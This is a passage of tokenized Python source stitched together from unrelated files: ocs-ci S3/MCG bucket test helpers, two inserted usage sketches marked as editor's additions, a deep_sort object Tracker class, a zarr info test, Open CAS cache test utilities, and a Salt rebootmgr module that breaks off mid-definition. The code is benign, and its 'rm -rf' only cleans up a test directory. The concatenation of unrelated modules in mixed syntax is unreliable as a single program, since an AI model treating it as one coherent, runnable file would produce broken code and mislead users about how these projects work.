target_dir)<line_sep>bucketname=bucket_factory(1)[0].name<line_sep>uploaded_objects_paths=get_full_path_object(downloaded_files bucketname)<line_sep>write_individual_s3_objects(mcg_obj awscli_pod bucket_factory downloaded_files target_dir bucket_name=bucketname )<line_sep>del_objects(uploaded_objects_paths awscli_pod mcg_obj)<line_sep>awscli_pod.exec_cmd_on_pod(command=f"rm -rf {target_dir}")<block_end><def_stmt>del_objects uploaded_objects_paths awscli_pod mcg_obj<block_start>""" Deleting objects from bucket Args: uploaded_objects_paths (list): List of object paths awscli_pod (pod): A pod running the AWSCLI tools mcg_obj (obj): An MCG object containing the MCG S3 connection credentials """<for_stmt>uploaded_filename uploaded_objects_paths<block_start>logger.info(f"Deleting object {uploaded_filename}")<line_sep>awscli_pod.exec_cmd_on_pod(command=craft_s3_command(mcg_obj "rm "+uploaded_filename) secrets=[mcg_obj.access_key_id mcg_obj.access_key mcg_obj.s3_internal_endpoint ] )<block_end><block_end><def_stmt>get_full_path_object downloaded_files bucket_name<block_start>""" Getting full of object in the bucket Args: downloaded_files (list): List of downloaded files bucket_name (str): Name of the bucket Returns: uploaded_objects_paths (list) : List of full paths of objects """<line_sep>uploaded_objects_paths=[]<for_stmt>uploaded_filename downloaded_files<block_start>uploaded_objects_paths.append(f"s3://{bucket_name}/{uploaded_filename}")<block_end><return>uploaded_objects_paths<block_end><def_stmt>obc_io_create_delete mcg_obj awscli_pod bucket_factory<block_start>""" Running IOs on OBC interface Args: mcg_obj (obj): An MCG object containing the MCG S3 connection credentials awscli_pod (pod): A pod running the AWSCLI tools bucket_factory: Calling this fixture creates a new bucket(s) 
"""<line_sep>dir="/aws/"+uuid4().hex+"_original/"<line_sep>downloaded_files=retrieve_test_objects_to_pod(awscli_pod dir)<line_sep>bucket_name=bucket_factory(amount=1 interface="OC")[0].name<line_sep>mcg_bucket_path=f"s3://{bucket_name}/"<line_sep>uploaded_objects_paths=get_full_path_object(downloaded_files bucket_name)<line_sep>sync_object_directory(awscli_pod dir mcg_bucket_path mcg_obj)<line_sep>del_objects(uploaded_objects_paths awscli_pod mcg_obj)<line_sep>awscli_pod.exec_cmd_on_pod(command=f"rm -rf {dir}")<block_end><def_stmt>retrieve_verification_mode <block_start><if_stmt>config.ENV_DATA["platform"].lower()<eq>"ibm_cloud"<block_start>verify=<true><block_end><elif_stmt>config.DEPLOYMENT.get("use_custom_ingress_ssl_cert")<block_start>verify=get_root_ca_cert()<block_end><else_stmt><block_start>verify=constants.DEFAULT_INGRESS_CRT_LOCAL_PATH<block_end>logger.debug(f"verification: '{verify}'")<line_sep><return>verify<block_end><def_stmt>namespace_bucket_update mcg_obj bucket_name read_resource write_resource<block_start>""" Edits MCG namespace bucket resources Args: mcg_obj (obj): An MCG object containing the MCG S3 connection credentials bucket_name (str): Name of the bucket read_resource (list): Resource names to provide read access write_resource (str): Resource name to provide write access """<line_sep>mcg_obj.send_rpc_query("bucket_api" "update_bucket" {"name":bucket_name "namespace":{"read_resources":read_resource "write_resource":write_resource } } )<block_end><def_stmt>write_random_objects_in_pod io_pod file_dir amount pattern="ObjKey"<block_start>""" Uses /dev/urandom to create and write random files in a given directory in a pod Args: io_pod (ocs_ci.ocs.ocp.OCP): The pod object in which the files should be generated and written file_dir (str): A string describing the path in which to write the files to amount (int): The amount of files to generate pattern (str): The file name pattern to use Returns: list: A list with the names of all written objects """<line_sep>obj_lst=[]<for_stmt>i range(amount)<block_start>object_key=pattern+"-{}".format(i)<line_sep>obj_lst.append(object_key)<line_sep>io_pod.exec_cmd_on_pod(f"dd if=/dev/urandom of={file_dir}/{object_key} bs=1M count=1 status=none")<block_end><return>obj_lst<block_end><def_stmt>setup_base_objects awscli_pod original_dir result_dir amount=2<block_start>""" Prepares two directories and populate one of them with objects Args: awscli_pod (Pod): A pod running the AWS CLI tools original_dir (str): original directory name result_dir (str): result directory name amount (Int): Number of test objects to create """<line_sep>awscli_pod.exec_cmd_on_pod(command=f"mkdir {original_dir} {result_dir}")<line_sep>write_random_objects_in_pod(awscli_pod original_dir amount)<block_end><def_stmt>check_cached_objects_by_name mcg_obj bucket_name expected_objects_names=<none><block_start>""" Check if the names of cached objects in a cache bucket are as expected using rpc call Args: mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials bucket_name (str): Name of the cache bucket expected_objects_names (list): Expected objects to be cached Returns: bool: True if all the objects exist in the cache as expected, False otherwise """<line_sep>res=mcg_obj.send_rpc_query("object_api" "list_objects" {"bucket":bucket_name } ).json()<line_sep>list_objects_res=[name["key"]<for>name 
res.get("reply").get("objects")]<if_stmt><not>expected_objects_names<block_start>expected_objects_names=[]<block_end><if_stmt>set(expected_objects_names)<eq>set(list_objects_res)<block_start>logger.info("Files cached as expected")<line_sep><return><true><block_end>logger.warning("Objects did not cache properly, \n"<concat>f"Expected: [{expected_objects_names}]\n"<concat>f"Cached: [{list_objects_res}]")<line_sep><return><false><block_end><def_stmt>wait_for_cache mcg_obj bucket_name expected_objects_names=<none><block_start>""" wait for existing cache bucket to cache all required objects Args: mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials bucket_name (str): Name of the cache bucket expected_objects_names (list): Expected objects to be cached """<line_sep>sample=TimeoutSampler(timeout=60 sleep=10 func=check_cached_objects_by_name mcg_obj=mcg_obj bucket_name=bucket_name expected_objects_names=expected_objects_names )<if_stmt><not>sample.wait_for_func_status(result=<true>)<block_start>logger.error("Objects were not able to cache properly")<line_sep><raise>UnexpectedBehaviour<block_end><block_end><def_stmt>compare_directory awscli_pod original_dir result_dir amount=2<block_start>""" Compares object checksums on original and result directories Args: awscli_pod (pod): A pod running the AWS CLI tools original_dir (str): original directory name result_dir (str): result directory name amount (int): Number of test objects to create """<for_stmt>i range(amount)<block_start>file_name=f"ObjKey-{i}"<assert_stmt>verify_s3_object_integrity(original_object_path=f"{original_dir}/{file_name}" result_object_path=f"{result_dir}/{file_name}" awscli_pod=awscli_pod ) "Checksum comparision between original and result object failed"<block_end><block_end><def_stmt>s3_copy_object s3_obj bucketname source object_key<block_start>""" Boto3 client based copy object Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket source (str): Source object key. eg: '<bucket>/<key> object_key (str): Unique object Identifier for copied object Returns: dict : Copy object response """<line_sep><return>s3_obj.s3_client.copy_object(Bucket=bucketname CopySource=source Key=object_key)<block_end><def_stmt>s3_upload_part_copy s3_obj bucketname copy_source object_key part_number upload_id<block_start>""" Boto3 client based upload_part_copy operation Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket copy_source (str): Name of the source bucket and key name. 
{bucket}/{key} part_number (int): Part number upload_id (str): Upload Id object_key (str): Unique object Identifier for copied object Returns: dict : upload_part_copy response """<line_sep><return>s3_obj.s3_client.upload_part_copy(Bucket=bucketname CopySource=copy_source Key=object_key PartNumber=part_number UploadId=upload_id )<block_end><def_stmt>s3_get_object_acl s3_obj bucketname object_key<block_start>""" Boto3 client based get_object_acl operation Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier for copied object Returns: dict : get object acl response """<line_sep><return>s3_obj.s3_client.get_object_acl(Bucket=bucketname Key=object_key)<block_end><def_stmt>s3_head_object s3_obj bucketname object_key if_match=<none><block_start>""" Boto3 client based head_object operation to retrieve only metadata Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier for copied object if_match (str): Return the object only if its entity tag (ETag) is the same as the one specified, Returns: dict : head object response """<if_stmt>if_match<block_start><return>s3_obj.s3_client.head_object(Bucket=bucketname Key=object_key IfMatch=if_match)<block_end><else_stmt><block_start><return>s3_obj.s3_client.head_object(Bucket=bucketname Key=object_key)<block_end><block_end><def_stmt>s3_list_objects_v1 s3_obj bucketname prefix="" delimiter="" max_keys=1000 marker=""<block_start>""" Boto3 client based list object version1 Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket prefix (str): Limits the response to keys that begin with the specified prefix. delimiter (str): Character used to group keys. max_keys (int): Maximum number of keys returned in the response. Default 1,000 keys. marker (str): key to start with when listing objects in a bucket. Returns: dict : list object v1 response """<line_sep><return>s3_obj.s3_client.list_objects(Bucket=bucketname Prefix=prefix Delimiter=delimiter MaxKeys=max_keys Marker=marker )<block_end><def_stmt>s3_list_objects_v2 s3_obj bucketname prefix="" delimiter="" max_keys=1000 con_token="" fetch_owner=<false> <block_start>""" Boto3 client based list object version2 Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket prefix (str): Limits the response to keys that begin with the specified prefix. delimiter (str): Character used to group keys. max_keys (int): Maximum number of keys returned in the response. Default 1,000 keys. con_token (str): Token used to continue the list fetch_owner (bool): Unique object Identifier Returns: dict : list object v2 response """<line_sep><return>s3_obj.s3_client.list_objects_v2(Bucket=bucketname Prefix=prefix Delimiter=delimiter MaxKeys=max_keys ContinuationToken=con_token FetchOwner=fetch_owner )<block_end><def_stmt>s3_delete_objects s3_obj bucketname object_keys<block_start>""" Boto3 client based delete objects Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_keys (list): The objects to delete. 
Format: {'Key': 'object_key', 'VersionId': ''} Returns: dict : delete objects response """<line_sep><return>s3_obj.s3_client.delete_objects(Bucket=bucketname Delete={"Objects":object_keys})<block_end><def_stmt>bucket_read_api mcg_obj bucket_name<block_start>""" Fetches the bucket metadata like size, tiers etc Args: mcg_obj (obj): MCG object bucket_name (str): Name of the bucket Returns: dict : Bucket policy response """<line_sep>resp=mcg_obj.send_rpc_query("bucket_api" "read_bucket" params={"name":bucket_name})<line_sep>bucket_read_resp=resp.json().get("reply")<line_sep><return>bucket_read_resp<block_end><def_stmt>get_bucket_available_size mcg_obj bucket_name<block_start>""" Function to get the bucket available size Args: mcg_obj (obj): MCG object bucket_name (str): Name of the bucket Returns: int : Available size in the bucket """<line_sep>resp=bucket_read_api(mcg_obj bucket_name)<line_sep>bucket_size=resp["storage"]["values"]["free"]<line_sep><return>bucket_size<block_end><def_stmt>compare_bucket_object_list mcg_obj first_bucket_name second_bucket_name<block_start>""" Compares the object lists of two given buckets Args: mcg_obj (MCG): An initialized MCG object first_bucket_name (str): The name of the first bucket to compare second_bucket_name (str): The name of the second bucket to compare Returns: bool: True if both buckets contain the same object names in all objects, False otherwise """<def_stmt>_comparison_logic <block_start>first_bucket_object_set={obj.key<for>obj mcg_obj.s3_list_all_objects_in_bucket(first_bucket_name)}<line_sep>second_bucket_object_set={obj.key<for>obj mcg_obj.s3_list_all_objects_in_bucket(second_bucket_name)}<if_stmt>first_bucket_object_set<eq>second_bucket_object_set<block_start>logger.info("Objects in both buckets are identical")<line_sep><return><true><block_end><else_stmt><block_start>logger.warning(f"""Buckets {first_bucket_name} and {second_bucket_name} do not contain the same objects. {first_bucket_name} objects: {first_bucket_object_set} {second_bucket_name} objects: {second_bucket_object_set} """)<line_sep><return><false><block_end><block_end><try_stmt><block_start><for_stmt>comparison_result TimeoutSampler(600 30 _comparison_logic)<block_start><if_stmt>comparison_result<block_start><return><true><block_end><block_end><block_end><except_stmt>TimeoutExpiredError<block_start>logger.error("The compared buckets did not contain the same set of objects after ten minutes")<line_sep><return><false><block_end><block_end><def_stmt>write_random_test_objects_to_bucket io_pod bucket_to_write file_dir amount=1 mcg_obj=<none> s3_creds=<none> <block_start>""" Write files generated by /dev/urandom to a bucket Args: io_pod (ocs_ci.ocs.ocp.OCP): The pod which should handle all needed IO operations bucket_to_write (str): The bucket name to write the random files to file_dir (str): The path to the folder where all random files will be generated and copied from amount (int, optional): The amount of random objects to write. Defaults to 1. mcg_obj (MCG, optional): An MCG class instance s3_creds (dict, optional): A dictionary containing S3-compatible credentials for writing objects directly to buckets outside of the MCG. Defaults to None. 
Returns: list: A list containing the names of the random files that were written """<line_sep>full_object_path=f"s3://{bucket_to_write}"<line_sep>obj_lst=write_random_objects_in_pod(io_pod file_dir amount)<line_sep>sync_object_directory(io_pod file_dir full_object_path s3_obj=mcg_obj signed_request_creds=s3_creds )<line_sep><return>obj_lst<block_end>
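# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# A minimal, hedged example of how the multipart-upload helpers above chain together:
# start the upload, push the pre-split parts, then complete (or abort on failure).
# `mcg_obj`, `awscli_pod`, `bucket_name`, `object_key`, `parts_dir` and `part_files`
# are placeholders supplied by the caller, not values defined in this module, and the
# MCG object is assumed to expose the `s3_client` used by the helpers.
def multipart_upload_sketch(mcg_obj, awscli_pod, bucket_name, object_key, parts_dir, part_files):
    # Initiate the multipart upload and keep its id for all later calls.
    upload_id = create_multipart_upload(mcg_obj, bucket_name, object_key)
    try:
        # Upload every pre-split part from the AWSCLI pod and collect the ETags.
        parts = upload_parts(mcg_obj, awscli_pod, bucket_name, object_key, parts_dir, upload_id, part_files)
        # Optionally inspect what the service has recorded so far.
        list_uploaded_parts(mcg_obj, bucket_name, object_key, upload_id)
        # Stitch the uploaded parts into the final object.
        return complete_multipart_upload(mcg_obj, bucket_name, object_key, upload_id, parts)
    except Exception:
        # Abort the upload on any failure so no orphaned parts are left behind.
        abort_multipart(mcg_obj, bucket_name, object_key, upload_id)
        raise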
# vim: expandtab:ts=4:sw=4 <import_from_future_stmt> absolute_import<import_stmt>numpy<as>np<import_stmt>pdb<import_from_stmt>. kf_2d kf_3d double_measurement_kf imm<import_from_stmt>. linear_assignment<import_from_stmt>. iou_matching<import_from_stmt>.track Track<import_from_stmt>. JPDA_matching<import_from_stmt>. tracking_utils<import_stmt>math<import_from_stmt>nn_matching NearestNeighborDistanceMetric<import_stmt>cv2<class_stmt>Tracker<block_start>""" This is the multi-target tracker. Parameters ---------- metric : nn_matching.NearestNeighborDistanceMetric A distance metric for measurement-to-track association. max_age : int Maximum number of missed misses before a track is deleted. n_init : int Number of consecutive detections before the track is confirmed. The track state is set to `Deleted` if a miss occurs within the first `n_init` frames. Attributes ---------- metric : nn_matching.NearestNeighborDistanceMetric The distance metric used for measurement to track association. max_age : int Maximum number of missed misses before a track is deleted. n_init : int Number of frames that a track remains in initialization phase. kf : EKF.KalmanFilter A Kalman filter to filter target trajectories in image space. tracks : List[Track] The list of active tracks at the current time step. """<def_stmt>__init__ self max_age=5 n_init=3 JPDA=<false> m_best_sol=1 assn_thresh=0.0 matching_strategy=<none> kf_appearance_feature=<none> gate_full_state=<false> lstm=<none> cuda=<false> appearance_model=<none> calib=<none> kf_vel_params=(1./20 1./160 1 1 2) dummy_node_cost_iou=0.4 dummy_node_cost_app=0.2 nn_budget=<none> use_imm=<false> kf_walk_params=(1./20 1./160 1 1 2) markov=(0.9 0.7) uncertainty_limit=1.8 optical_flow=<false> gate_limit=400<block_start>self.max_age=max_age<line_sep>self.n_init=n_init<line_sep>self.metric=NearestNeighborDistanceMetric("euclidean" nn_budget)<if_stmt><not>use_imm<block_start>self.kf=kf_2d.KalmanFilter2D(*kf_vel_params gate_limit)<line_sep>self.use_imm=<false><block_end><else_stmt><block_start>self.kf=imm.IMMFilter2D(kf_vel_params kf_walk_params markov=markov)<line_sep>self.use_imm=<true><block_end>self.tracks=[]<line_sep>self._next_id=1<line_sep>self.JPDA=JPDA<line_sep>self.m_best_sol=m_best_sol<line_sep>self.assn_thresh=assn_thresh<line_sep>self.matching_strategy=matching_strategy<line_sep>self.kf_appearance_feature=kf_appearance_feature<line_sep>self.gate_only_position=<not>gate_full_state<line_sep>self.lstm=lstm<line_sep>self.cuda=cuda<line_sep>self.dummy_node_cost_app=dummy_node_cost_app<line_sep>self.dummy_node_cost_iou=dummy_node_cost_iou<line_sep>self.appearance_model=appearance_model<line_sep>self.prev_frame=<none><line_sep>self.uncertainty_limit=uncertainty_limit<line_sep>self.optical_flow=optical_flow<block_end># @profile <def_stmt>gated_metric self tracks dets track_indices detection_indices compare_2d=<false><block_start>targets=np.array([tracks[i].track_id<for>i track_indices])<if_stmt><not>compare_2d<and>self.metric.check_samples(targets)<block_start>compare_2d=<true><block_end><if_stmt>compare_2d<block_start>features=np.array([dets[i].appearance_feature<for>i detection_indices])<block_end><else_stmt><block_start>features=np.array([dets[i].feature<for>i detection_indices])<block_end>#cost_matrix = self.metric.distance(features, targets, compare_2d) cost_matrix_appearance=self.metric.distance_torch(features targets compare_2d)<line_sep>cost_matrix_iou=iou_matching.iou_cost(tracks dets track_indices 
detection_indices)<line_sep>gate_mask=linear_assignment.gate_cost_matrix(self.kf tracks dets track_indices detection_indices only_position=self.gate_only_position)<line_sep>cost_matrix=np.dstack((cost_matrix_appearance cost_matrix_iou))<line_sep><return>cost_matrix gate_mask<block_end><def_stmt>predict self<block_start>"""Propagate track state distributions one time step forward. This function should be called once every time step, before `update`. """<for_stmt>track self.tracks<block_start>track.predict(self.kf)<block_end><block_end># @profile <def_stmt>update self cur_frame detections compare_2d=<false><block_start>"""Perform measurement update and track management. Parameters ---------- detections : List[deep_sort.detection.Detection] A list of detections at the current time step. """<line_sep>self.cur_frame=cv2.cvtColor((255<times>cur_frame).permute(1 2 0).cpu().numpy() cv2.COLOR_BGR2GRAY)<line_sep>matches,unmatched_tracks,unmatched_detections=self._match(detections compare_2d)<line_sep># update filter for each assigned track # Only do this for non-JPDA because in JPDA the kf states are updated # during the matching process <if_stmt><not>self.JPDA# Map matched tracks to detections <block_start>track_detection_map={t:d<for>(t d) matches}<line_sep># Map unmatched tracks to -1 for no detection <for_stmt>t unmatched_tracks<block_start>track_detection_map[t]=-1<block_end><for_stmt>track_idx,detection_idx matches<block_start>self.tracks[track_idx].update(self.kf detections detection_idx=detection_idx JPDA=self.JPDA cur_frame=self.cur_frame appearance_model=self.appearance_model lstm=self.lstm)<block_end><block_end># update track state for unmatched tracks <for_stmt>track_idx unmatched_tracks<block_start>self.tracks[track_idx].mark_missed()<block_end># create new tracks self.prune_tracks()<line_sep>flow=<none><if_stmt>unmatched_detections<block_start><if_stmt>self.optical_flow<and>self.prev_frame<is><not><none><block_start>flow=cv2.calcOpticalFlowFarneback(self.prev_frame self.cur_frame <none> 0.5 3 15 3 5 1.2 0)<block_end><block_end><for_stmt>detection_idx unmatched_detections<block_start>self._initiate_track(detections[detection_idx] flow)<block_end># Update distance metric. active_targets=[t.track_id<for>t self.tracks]<line_sep>features,features_2d,targets,targets_2d=[] [] [] []<for_stmt>track self.tracks<block_start>features<augadd>track.features<line_sep>features_2d<augadd>track.features_2d<line_sep>targets<augadd>[track.track_id<for>_ track.features]<line_sep>targets_2d<augadd>[track.track_id<for>_ track.features_2d]<line_sep>track.features=[]<line_sep>track.features_2d=[]<block_end>self.metric.partial_fit(np.asarray(features) np.asarray(features_2d) np.asarray(targets) np.asarray(targets_2d) active_targets)<line_sep>self.prev_frame=self.cur_frame<block_end># @profile <def_stmt>_match self detections compare_2d# Associate all tracks using combined cost matrices. 
<block_start><if_stmt>self.JPDA# Run JPDA on all tracks <block_start>marginalizations=linear_assignment.JPDA(self.gated_metric self.dummy_node_cost_app self.dummy_node_cost_iou self.tracks detections m=self.m_best_sol compare_2d=compare_2d)<line_sep># for track in self.tracks: #TODO: REMOVE # print(track.track_id) # print(marginalizations) jpda_matcher=JPDA_matching.Matcher(detections marginalizations range(len(self.tracks)) self.matching_strategy assignment_threshold=self.assn_thresh)<line_sep>matches_a,unmatched_tracks_a,unmatched_detections=jpda_matcher.match()<line_sep># Map matched tracks to detections # Map matched tracks to detections track_detection_map={t:d<for>(t d) matches_a}<line_sep># Map unmatched tracks to -1 for no detection <for_stmt>t unmatched_tracks_a<block_start>track_detection_map[t]=-1<block_end># update Kalman state <if_stmt>marginalizations.shape[0]<g>0<block_start><for_stmt>i range(len(self.tracks))<block_start>self.tracks[i].update(self.kf detections marginalization=marginalizations[i :] detection_idx=track_detection_map[i] JPDA=self.JPDA cur_frame=self.cur_frame appearance_model=self.appearance_model lstm=self.lstm)<block_end><block_end><block_end><else_stmt><block_start>confirmed_tracks=[i<for>i,t enumerate(self.tracks)<if>t.is_confirmed()]<line_sep>matches_a,unmatched_tracks_a,unmatched_detections=linear_assignment.matching_cascade(self.gated_metric self.dummy_node_cost_iou self.max_age self.tracks detections confirmed_tracks compare_2d=compare_2d)<block_end><return>matches_a unmatched_tracks_a unmatched_detections<block_end><def_stmt>_initiate_track self detection flow=<none><block_start><if_stmt>self.use_imm<block_start>mean,covariance,model_probabilities=self.kf.initiate(detection.to_xywh() flow)<block_end><else_stmt><block_start>mean,covariance=self.kf.initiate(detection.to_xywh() flow)<line_sep>model_probabilities=<none><block_end>self.tracks.append(Track(mean covariance model_probabilities self._next_id self.n_init self.max_age kf_appearance_feature=self.kf_appearance_feature feature=detection.feature appearance_feature=detection.appearance_feature cuda=self.cuda lstm=self.lstm last_det=detection))<line_sep>self._next_id<augadd>1<block_end><def_stmt>prune_tracks self<block_start>h,w=self.cur_frame.shape<for_stmt>track self.tracks# Check if track is leaving <block_start><if_stmt>self.use_imm<block_start>predicted_mean,predicted_cov=self.kf.combine_states(track.mean track.covariance track.model_probabilities)#TODO: This doesn't predict. 
Mean should def predict <block_end><else_stmt><block_start>predicted_mean=self.kf.predict_mean(track.mean)<line_sep>predicted_cov=track.covariance<block_end>predicted_pos=predicted_mean[:2]<line_sep>predicted_vel=predicted_mean[4:6]<line_sep>predicted_pos[0]<augsub>w/2<line_sep>predicted_pos[1]<augsub>h/2<line_sep>cos_theta=np.dot(predicted_pos predicted_vel)/(np.linalg.norm(predicted_pos)<times>np.linalg.norm(predicted_vel)+1e-6)<line_sep>predicted_pos[0]<augadd>w/2<line_sep>predicted_pos[1]<augadd>h/2<line_sep># Thresholds for deciding whether track is outside image BORDER_VALUE=0<if_stmt>(cos_theta<g>0<and>(predicted_pos[0]-track.mean[2]/2<le>BORDER_VALUE<or>predicted_pos[0]+track.mean[2]/2<ge>w-BORDER_VALUE))<block_start><if_stmt>track.is_exiting()<and><not>track.matched<block_start>track.delete_track()<block_end><else_stmt><block_start>track.mark_exiting()<block_end><block_end># Check if track is too uncertain # cov_axis,_ = np.linalg.eigh(predicted_cov) # if np.abs(np.sqrt(cov_axis[-1]))*6 > self.uncertainty_limit*np.linalg.norm(predicted_mean[2:4]): # track.delete_track() <block_end>self.tracks=[t<for>t self.tracks<if><not>t.is_deleted()]<block_end><block_end>
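# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# A hedged outline of how the Tracker above is typically driven: predict() once per
# time step, then update() with the current frame and its detections. The frame is
# assumed to be a CHW float tensor (update() permutes and scales it), and the
# detections are assumed to be Detection objects from the surrounding project;
# `frames` and `detections_per_frame` are placeholder iterables, not module values.
def track_sequence_sketch(frames, detections_per_frame):
    tracker = Tracker(max_age=5, n_init=3, JPDA=False)
    for frame, detections in zip(frames, detections_per_frame):
        tracker.predict()                  # propagate every track one step forward
        tracker.update(frame, detections)  # associate detections, manage track lifecycle
        # Report the ids of tracks that have survived the n_init confirmation window.
        yield [t.track_id for t in tracker.tracks if t.is_confirmed()]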
<import_stmt>numcodecs<import_stmt>pytest<import_stmt>zarr<import_from_stmt>zarr.util InfoReporter<line_sep>@pytest.mark.parametrize('array_size' [10 15000])<def_stmt>test_info array_size# setup <block_start>g=zarr.group(store=dict() chunk_store=dict() synchronizer=zarr.ThreadSynchronizer())<line_sep>g.create_group('foo')<line_sep>z=g.zeros('bar' shape=array_size filters=[numcodecs.Adler32()])<line_sep># test group info items=g.info_items()<line_sep>keys=sorted([k<for>k,_ items])<line_sep>expected_keys=sorted(['Type' 'Read-only' 'Synchronizer type' 'Store type' 'Chunk store type' 'No. members' 'No. arrays' 'No. groups' 'Arrays' 'Groups' 'Name'])<assert_stmt>expected_keys<eq>keys<line_sep># can also get a string representation of info via the info attribute <assert_stmt>isinstance(g.info InfoReporter)<assert_stmt>"Type"<in>repr(g.info)<line_sep># test array info items=z.info_items()<line_sep>keys=sorted([k<for>k,_ items])<line_sep>expected_keys=sorted(['Type' 'Data type' 'Shape' 'Chunk shape' 'Order' 'Read-only' 'Filter [0]' 'Compressor' 'Synchronizer type' 'Store type' 'Chunk store type' 'No. bytes' 'No. bytes stored' 'Storage ratio' 'Chunks initialized' 'Name'])<assert_stmt>expected_keys<eq>keys<line_sep># can also get a string representation of info via the info attribute <assert_stmt>isinstance(z.info InfoReporter)<assert_stmt>"Type"<in>repr(z.info)<block_end>
# # Copyright(c) 2019-2021 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause-Clear # <import_from_stmt>api.cas casadm<import_from_stmt>api.cas ioclass_config<import_from_stmt>api.cas.cache_config CacheLineSize CacheMode CleaningPolicy SeqCutOffPolicy <import_from_stmt>core.test_run TestRun<import_from_stmt>test_tools.dd Dd<import_from_stmt>test_tools.fio.fio Fio<import_from_stmt>test_tools.fio.fio_param ReadWrite IoEngine<import_from_stmt>test_utils.os_utils Udev sync<import_from_stmt>test_utils.os_utils drop_caches DropCachesMode<import_from_stmt>test_utils.size Size Unit<line_sep>ioclass_config_path="/tmp/opencas_ioclass.conf"<line_sep>mountpoint="/tmp/cas1-1"<def_stmt>prepare cache_size=Size(10 Unit.GibiByte) core_size=Size(40 Unit.GibiByte) cache_mode=CacheMode.WB cache_line_size=CacheLineSize.LINE_4KiB default_allocation="0.00"<block_start>ioclass_config.remove_ioclass_config()<line_sep>cache_device=TestRun.disks["cache"]<line_sep>core_device=TestRun.disks["core"]<line_sep>cache_device.create_partitions([cache_size])<line_sep>core_device.create_partitions([core_size])<line_sep>cache_device=cache_device.partitions[0]<line_sep>core_device=core_device.partitions[0]<line_sep>TestRun.LOGGER.info(f"Starting cache")<line_sep>cache=casadm.start_cache(cache_device cache_mode=cache_mode cache_line_size=cache_line_size force=<true>)<line_sep>Udev.disable()<line_sep>TestRun.LOGGER.info(f"Setting cleaning policy to NOP")<line_sep>casadm.set_param_cleaning(cache_id=cache.cache_id policy=CleaningPolicy.nop)<line_sep>TestRun.LOGGER.info(f"Adding core device")<line_sep>core=casadm.add_core(cache core_dev=core_device)<line_sep>TestRun.LOGGER.info(f"Setting seq cutoff policy to never")<line_sep>core.set_seq_cutoff_policy(SeqCutOffPolicy.never)<line_sep>ioclass_config.create_ioclass_config(add_default_rule=<false> ioclass_config_path=ioclass_config_path)<line_sep># To make test more precise all workload except of tested ioclass should be # put in pass-through mode ioclass_config.add_ioclass(ioclass_id=ioclass_config.DEFAULT_IO_CLASS_ID eviction_priority=ioclass_config.DEFAULT_IO_CLASS_PRIORITY allocation=default_allocation rule=ioclass_config.DEFAULT_IO_CLASS_RULE ioclass_config_path=ioclass_config_path )<line_sep>output=TestRun.executor.run(f"mkdir -p {mountpoint}")<if_stmt>output.exit_code<ne>0<block_start><raise>Exception(f"Failed to create mountpoint")<block_end><return>cache core<block_end><def_stmt>get_io_class_occupancy cache io_class_id percent=<false><block_start><return>get_io_class_usage(cache io_class_id percent).occupancy<block_end><def_stmt>get_io_class_dirty cache io_class_id<block_start><return>get_io_class_usage(cache io_class_id).dirty<block_end><def_stmt>get_io_class_usage cache io_class_id percent=<false><block_start><return>cache.get_io_class_statistics(io_class_id=io_class_id percentage_val=percent).usage_stats<block_end><def_stmt>run_io_dir path size_4k offset=0<block_start>dd=(Dd().input("/dev/zero").output(f"{path}").count(size_4k).block_size(Size(1 Unit.Blocks4096)).seek(offset))<line_sep>TestRun.LOGGER.info(f"{dd}")<line_sep>output=dd.run()<if_stmt>output.exit_code<ne>0<block_start>TestRun.fail(f"Failed to execute dd.\n {output.stdout}\n{output.stderr}")<block_end>sync()<line_sep>drop_caches(DropCachesMode.ALL)<block_end><def_stmt>run_io_dir_read path<block_start>dd=Dd().output("/dev/null").input(f"{path}")<line_sep>output=dd.run()<if_stmt>output.exit_code<ne>0<block_start>TestRun.fail(f"Failed to execute dd.\n 
{output.stdout}\n{output.stderr}")<block_end>sync()<line_sep>drop_caches(DropCachesMode.ALL)<block_end><def_stmt>run_fio_count core blocksize num_ios<block_start>(Fio().create_command().target(core).io_engine(IoEngine.libaio).read_write(ReadWrite.randread).block_size(blocksize).direct().file_size(Size(10 Unit.GibiByte)).num_ios(num_ios).run())<block_end>
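# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# A hedged outline of how the helpers above are combined in an io-class test: prepare
# a cache/core pair, drive writes and reads through the mountpoint, then read back the
# per-io-class statistics. In a real test the core would first get a filesystem, be
# mounted at `mountpoint`, and have its own io-class rule loaded; `io_class_id=1` and
# the file name/size below are placeholder values, not constants of this module.
def example_ioclass_workflow():
    cache, core = prepare()                        # start cache, add core, write base io-class config
    test_file = f"{mountpoint}/ioclass_test_file"
    run_io_dir(test_file, 1024)                    # write 1024 x 4KiB blocks through the cache
    run_io_dir_read(test_file)                     # read the same data back
    occupancy = get_io_class_occupancy(cache, io_class_id=1)
    dirty = get_io_class_dirty(cache, io_class_id=1)
    TestRun.LOGGER.info(f"io class 1: occupancy={occupancy}, dirty={dirty}")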
""" :maintainer: <NAME> <<EMAIL>> :maturity: new :depends: None :platform: Linux .. versionadded:: 3004 """<import_stmt>logging<import_stmt>re<import_stmt>salt.exceptions<line_sep>log=logging.getLogger(__name__)<def_stmt>__virtual__ <block_start>"""rebootmgrctl command is required."""<if_stmt>__utils__["path.which"]("rebootmgrctl")<is><not><none><block_start><return><true><block_end><else_stmt><block_start><return>(<false> "Module rebootmgt requires the command rebootmgrctl")<block_end><block_end><def_stmt>_cmd cmd retcode=<false><block_start>"""Utility function to run commands."""<line_sep>result=__salt__["cmd.run_all"](cmd)<if_stmt>retcode<block_start><return>result["retcode"]<block_end><if_stmt>result["retcode"]<block_start><raise>salt.exceptions.CommandExecutionError(result["stderr"])<block_end><return>result["stdout"]<block_end><def_stmt>version <block_start>"""Return the version of rebootmgrd CLI Example: .. code-block:: bash salt microos rebootmgr version """<line_sep>cmd=["rebootmgrctl" "--version"]<line_sep><return>_cmd(cmd).split()[-1]<block_end><def_stmt>is_active 